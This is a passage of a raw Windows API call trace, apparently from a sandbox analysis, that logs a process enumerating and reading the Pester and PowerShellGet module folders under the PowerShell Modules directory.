lpFileInformation=0x1b81e620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0265.428] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0265.428] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0265.428] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0265.428] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", lpFilePart=0x0) returned 0x32 [0265.428] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dafc0 [0265.428] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.428] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0265.429] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0265.429] FindClose (in: hFindFile=0x1a8dafc0 | out: hFindFile=0x1a8dafc0) returned 1 [0265.429] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0265.429] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e480) returned 1 [0265.429] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0x1b81e170, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0265.429] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e5b0) returned 1 [0265.429] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b81e690 | out: lpFileInformation=0x1b81e690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5)) returned 1 [0265.429] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e570) returned 1 [0265.429] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0x1b81de70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0265.429] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e350) returned 1 [0265.429] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x564 [0265.430] GetFileType (hFile=0x564) returned 0x1 [0265.430] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e2c0) returned 1 [0265.430] GetFileType (hFile=0x564) returned 0x1 [0265.430] ReadFile (in: hFile=0x564, lpBuffer=0x22af7a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b81e428, lpOverlapped=0x0 | out: lpBuffer=0x22af7a0*, lpNumberOfBytesRead=0x1b81e428*=0x1000, lpOverlapped=0x0) returned 1 [0265.430] ReadFile (in: hFile=0x564, lpBuffer=0x22af7a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b81e428, lpOverlapped=0x0 | out: lpBuffer=0x22af7a0*, lpNumberOfBytesRead=0x1b81e428*=0x1000, lpOverlapped=0x0) returned 1 [0265.430] ReadFile (in: hFile=0x564, lpBuffer=0x22af7a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b81e428, lpOverlapped=0x0 | out: lpBuffer=0x22af7a0*, lpNumberOfBytesRead=0x1b81e428*=0x1000, lpOverlapped=0x0) returned 1 [0265.431] ReadFile (in: hFile=0x564, lpBuffer=0x22af7a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b81e428, lpOverlapped=0x0 | out: lpBuffer=0x22af7a0*, lpNumberOfBytesRead=0x1b81e428*=0x5e5, lpOverlapped=0x0) returned 1 [0265.431] ReadFile (in: hFile=0x564, lpBuffer=0x22aecc5, nNumberOfBytesToRead=0x21b, lpNumberOfBytesRead=0x1b81e428, lpOverlapped=0x0 | out: lpBuffer=0x22aecc5*, lpNumberOfBytesRead=0x1b81e428*=0x0, lpOverlapped=0x0) returned 1 [0265.431] ReadFile (in: hFile=0x564, lpBuffer=0x22af7a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b81e428, lpOverlapped=0x0 | out: lpBuffer=0x22af7a0*, lpNumberOfBytesRead=0x1b81e428*=0x0, lpOverlapped=0x0) returned 1 [0265.431] CloseHandle (hObject=0x564) returned 1 [0265.433] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psd1")) returned 0xffffffff [0265.433] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psm1")) returned 0xffffffff [0265.433] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.cdxml")) returned 0xffffffff [0265.433] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.xaml")) returned 0xffffffff [0265.434] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.dll")) returned 0xffffffff [0265.434] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0265.434] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0265.434] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\", lpFilePart=0x0) returned 0x39 [0265.434] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.434] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.435] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0265.435] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0265.435] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.435] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0265.435] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0265.435] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0265.435] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0265.435] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\", lpFilePart=0x0) returned 0x39 [0265.435] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dafc0 [0265.436] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.436] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0265.436] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 0 [0265.436] FindClose (in: hFindFile=0x1a8dafc0 | out: hFindFile=0x1a8dafc0) returned 1 [0265.436] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0265.436] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0265.436] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e380) returned 1 [0265.437] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x1b81de70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40 [0265.437] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\", nBufferLength=0x105, lpBuffer=0x1b81de10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\", lpFilePart=0x0) returned 0x41 [0265.437] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\*", lpFindFileData=0x1b81e020 | out: lpFindFileData=0x1b81e020*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.437] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.437] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0265.479] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ac4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet.psd1", cAlternateFileName="POWERS~1.PSD")) returned 1 [0265.479] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Format.ps1xml", cAlternateFileName="PSGETF~1.PS1")) returned 1 [0265.480] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x143ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Resource.psd1", cAlternateFileName="PSGETR~1.PSD")) returned 1 [0265.480] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 1 [0265.480] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 0 [0265.480] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.480] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e2d0) returned 1 [0265.480] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e290) returned 1 [0265.480] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e380) returned 1 [0265.480] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x1b81de70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40 [0265.480] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\", nBufferLength=0x105, lpBuffer=0x1b81de10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\", lpFilePart=0x0) returned 0x41 [0265.480] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\*", lpFindFileData=0x1b81e020 | out: lpFindFileData=0x1b81e020*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.481] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.481] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0265.481] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ac4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet.psd1", cAlternateFileName="POWERS~1.PSD")) returned 1 [0265.481] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Format.ps1xml", cAlternateFileName="PSGETF~1.PS1")) returned 1 [0265.481] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x143ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Resource.psd1", cAlternateFileName="PSGETR~1.PSD")) returned 1 [0265.482] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 1 [0265.482] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0265.482] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.482] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e2d0) returned 1 [0265.482] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e290) returned 1 [0265.482] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x1b81df10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40 [0265.482] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x1b81df70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40 [0265.482] 